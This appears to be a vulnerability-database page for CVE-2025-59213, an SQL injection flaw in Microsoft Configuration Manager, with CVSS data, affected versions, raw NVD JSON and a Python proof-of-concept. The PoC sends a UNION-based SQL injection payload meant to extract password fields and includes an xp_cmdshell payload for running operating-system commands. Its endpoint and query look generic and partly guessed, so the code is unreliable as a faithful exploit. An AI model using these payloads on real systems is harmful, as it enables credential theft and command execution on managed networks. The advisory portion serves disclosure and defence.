Security Vulnerability Report
中文
CVE-2025-59213 CVSS 8.8 HIGH

CVE-2025-59213

Published: 2025-10-14 17:16:02
Last Modified: 2026-02-13 21:16:19
Source: [email protected]

Description

Improper neutralization of special elements used in an sql command ('sql injection') in Microsoft Configuration Manager allows an unauthorized attacker to elevate privileges over an adjacent network.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:microsoft:configuration_manager_2403:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:microsoft:configuration_manager_2409:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:microsoft:configuration_manager_2503:*:*:*:*:*:*:*:* - VULNERABLE
Microsoft Configuration Manager (所有受支持的版本,具体版本范围需参考Microsoft官方安全公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-59213 - Microsoft Configuration Manager SQL Injection PoC # Vulnerability: Improper neutralization of special elements used in an SQL command # Affected: Microsoft Configuration Manager # Attack Vector: Adjacent Network (AV:A), No Authentication Required (PR:N) import requests import socket import struct TARGET_HOST = "192.168.1.100" # SCCM Site Server IP SMS_PROVIDER_PORT = 80 # SMS Provider default port def exploit_sql_injection(target_host, port): """ Exploit SQL injection in Microsoft Configuration Manager SMS Provider. The SMS Provider service fails to properly sanitize user-supplied input before incorporating it into SQL queries against the site database. """ # Malicious SQL payload leveraging UNION-based injection # The injection point is typically in resource discovery or client registration requests sql_payload = ( "1' UNION SELECT " "@@version, " "SYSTEM_USER, " "(SELECT TOP 1 password FROM v_R_System), " "DB_NAME(), " "'injected'-- " ) # WMI/SMS Provider query exploitation # The SMS Provider exposes management data via WMI/CIM interfaces wmi_namespace = "root\\sms\\site_<SITE_CODE>" headers = { "Content-Type": "application/xml; charset=utf-8", "User-Agent": "MOCP/5.0", } # Crafted SOAP/WMI request with injected SQL payload payload_xml = f"""<?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope"> <soap:Body> <ExecuteQuery xmlns="http://schemas.microsoft.com/sms/2005/06/management"> <query>SELECT * FROM v_R_System WHERE Name LIKE '%{sql_payload}%'</query> </ExecuteQuery> </soap:Body> </soap:Envelope>""" try: url = f"http://{target_host}:{port}/sms_provider" response = requests.post(url, data=payload_xml, headers=headers, timeout=10) if response.status_code == 200: print("[+] SQL Injection successful!") print(f"[+] Response: {response.text[:500]}") return response.text else: print(f"[-] Request failed with status: {response.status_code}") except Exception as e: print(f"[-] Error: {e}") return None def escalate_privileges(sql_result): """ Post-exploitation: Use extracted credentials to escalate privileges and gain control over the Configuration Manager infrastructure. """ # Extract sensitive information from SQL injection result # Use xp_cmdshell for OS command execution if SQL Server privileges allow cmdshell_payload = "1'; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'whoami';--" print(f"[*] Attempting privilege escalation via: {cmdshell_payload}") if __name__ == "__main__": print(f"[*] Targeting Microsoft Configuration Manager at {TARGET_HOST}") result = exploit_sql_injection(TARGET_HOST, SMS_PROVIDER_PORT) if result: escalate_privileges(result)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59213", "sourceIdentifier": "[email protected]", "published": "2025-10-14T17:16:01.807", "lastModified": "2026-02-13T21:16:19.043", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper neutralization of special elements used in an sql command ('sql injection') in Microsoft Configuration Manager allows an unauthorized attacker to elevate privileges over an adjacent network."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:configuration_manager_2403:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.00.9128.1035", "matchCriteriaId": "9CEB0E6F-E984-4382-9C88-C506615D9868"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:configuration_manager_2409:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.00.9132.1029", "matchCriteriaId": "E3B2EC65-EAFA-4938-AAA4-EC49C6A854BA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:configuration_manager_2503:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.00.9135.1008", "matchCriteriaId": "EB0C2F23-3D0B-4683-8956-9DF40D440F2F"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59213", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.